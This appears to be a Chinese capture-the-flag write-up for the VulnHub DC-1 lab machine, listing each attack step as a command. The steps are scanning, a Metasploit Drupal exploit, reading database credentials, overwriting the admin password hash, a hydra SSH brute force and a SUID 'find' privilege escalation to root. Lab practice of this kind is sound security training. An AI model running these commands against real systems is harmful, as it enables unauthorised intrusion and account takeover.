靶机下载地址:DC: 1 ~ VulnHub
一.主机扫描
kali作为攻击机和DC靶机都做了NAT地址,都在同一网段中
1.利用 arp-scan -l 命令扫描同网段内的其他存活主机。
2.利用nmap工具来对目标靶机进行扫描
nmap -p 1-65535 -A -sV 192.168.75.129
发现了三个端口,80、22和111三个端口。80和22端口可以进行攻击,111端口一般是rpcbind漏洞(该漏洞可使攻击者在远程rpcbind绑定主机上分配任意大小的内存(每次攻击最高可达4GB),除非进程崩溃,或者管理员挂起/重启rpcbind服务,否则该内存不会被释放。)不考虑使用。
二、信息收集
对80端口进行访问
三、漏洞攻击
1.使用msf进行攻击。
使用serach Drupal查询可利用的脚本所在
设置RHOST和payload进行攻击
写入交互式shell python -c 'import pty;pty.spawn("/bin/bash");'
升级shell
2.进入系统后查看可利用的信息
ls查看发现有flag1.txt文件,cat flag1.txt,发现提示信息:
提示配置文件。发现在sites/default中有settings.php配置文件。查看settings.php,发现flag2
除此之外还在下方发现了数据库用户密码配置:
用到mysql数据库,查看是否在运行 ps aux | grep mysql
3.进入数据库
mysql正在运行,用刚才发现的密码进入数据库
查看数据库中的用户信息:
use drupaldb; (选择数据使用)
show tables; (查看表)
查找到users表,查看表信息
发现密码是进过加密的,重置密码,可利/scripts/password-hash.sh脚本进行生成新密码。
进到数据库中修改admin的密码值(更新 表名 设置 列名=’更改的值‘ where 列名=1;)
update users set pass="$S$DCPR84MPBajVseMqMtyn8.iCwftRBoeBZ2kN71gMeX5ubkUj/jpC" where uid=1;
此时进入到数据库需要先选择数据库,否则修改密码不成功
4.登录到系统
密码修改成功后,登录到网站:
发现flag3
查看/etc/passwd文件
发现flag,该服务器开放了22端口,可以用hydra工具进行爆破
hydra -l flag4 -P /usr/share/john/password.lst 192.168.75.129 ssh -vV -f -o hydra.ssh
拿到密码 login:flag4 password:orange,用ssh登录
查看一下用户有权访问的 SUID 二进制文件:
find / -perm -u=s -type f 2>/dev/null
发现 find 有 SUID 权限的,可以利用 find 提权:
find ./ aaa -exec '/bin/sh' \;
得到root权限,查看root下的flag文件
完成提权操作。